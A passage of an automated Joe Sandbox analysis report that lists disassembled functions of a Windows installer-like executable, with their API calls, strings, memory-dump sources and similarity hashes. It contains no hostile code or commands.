                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                                                                                                                                                                  • API String ID: 0-2329492092
                                                                                                                                                                                                                                  • Opcode ID: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                                                                                                                                                                  • Instruction ID: 9de4db1b3e70fdebeced0fe060001c857bcfdee1b2562a0b259a97201065334e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46D12F34A00108DFCB14EB99D985AED77F5EF49304F5440BAE404EB362D778AE85CB9A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00483084 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ActiveChangeNotifyWindow
                                                                                                                                                                                                                                  • String ID: $Need to restart Windows? %s
                                                                                                                                                                                                                                  • API String ID: 1160245247-4200181552
                                                                                                                                                                                                                                  • Opcode ID: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                                                                                                                                                                  • Instruction ID: 855c298393525188f16043e43c8caa20abfdb27870bda8f6eb76b0fac02994d3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E918F34A042449FDB10EF69D8C6BAD77E0AF55708F5484BBE8009B362DB78AE05CB5D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0046FADC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                                                                                                                                                                  • String ID: Creating directory: %s
                                                                                                                                                                                                                                  • API String ID: 2451617938-483064649
                                                                                                                                                                                                                                  • Opcode ID: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                                                                                                                                                  • Instruction ID: a145aa70eb484b5d007d33f2831cd5d1f219efd535f83afbcf26a903565c5eea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D512F74E00248ABDB01DBA5D982ADEBBF4AF49304F50847AEC50B7382D7795E08CB59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00454DD4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressByteCharMultiProcWide
                                                                                                                                                                                                                                  • String ID: SfcIsFileProtected$sfc.dll
                                                                                                                                                                                                                                  • API String ID: 2508298434-591603554
                                                                                                                                                                                                                                  • Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                                                                                                                                                  • Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8419671A04318DBEB20EF59DC85B9DB7B8AB4430DF5041B7A908A7293D7785F88CA1C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00452510 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • 74D41520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                                                                                                                                                                                                  • 74D41500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
                                                                                                                                                                                                                                  • 74D41540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: D41500D41520D41540
                                                                                                                                                                                                                                  • String ID: %E
                                                                                                                                                                                                                                  • API String ID: 2153611984-175436132
                                                                                                                                                                                                                                  • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                                                                                                                                                  • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0044B38C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0044B401
                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ObjectReleaseSelect
                                                                                                                                                                                                                                  • String ID: %H
                                                                                                                                                                                                                                  • API String ID: 1831053106-1959103961
                                                                                                                                                                                                                                  • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                                                                                                                                                  • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0044B0C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                                                                                                                                                                                                  • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                                                                                                                                                                                  • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DrawText$ByteCharMultiWide
                                                                                                                                                                                                                                  • String ID: %H
                                                                                                                                                                                                                                  • API String ID: 65125430-1959103961
                                                                                                                                                                                                                                  • Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                                                                                                                                                                  • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042ED38 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                                                                                                                                                                    • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                                                                                                                                    • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                                                                                                                                    • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                                                                                                                                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                                  • API String ID: 395431579-1506664499
                                                                                                                                                                                                                                  • Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                                                                                                                                                                  • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00455A10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                                                                                                                                                                                                  • PendingFileRenameOperations2, xrefs: 00455A4F
                                                                                                                                                                                                                                  • PendingFileRenameOperations, xrefs: 00455A40
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                  • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                                                                                                                                                  • API String ID: 47109696-2115312317
                                                                                                                                                                                                                                  • Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                                                                                                                                                                  • Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00472154 Relevance: 6.3, APIs: 4, Instructions: 272fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$CloseFileNext
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2066263336-0
                                                                                                                                                                                                                                  • Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                                                                                                                                                                  • Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0047FCF8 Relevance: 6.1, APIs: 4, Instructions: 147fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$CloseFileNext
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2066263336-0
                                                                                                                                                                                                                                  • Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                                                                                                                                                                  • Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00421274 Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetMenu.USER32(00000000), ref: 00421361
                                                                                                                                                                                                                                  • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                                                                                                                                                                                                  • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                                                                                                                                                                                                  • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
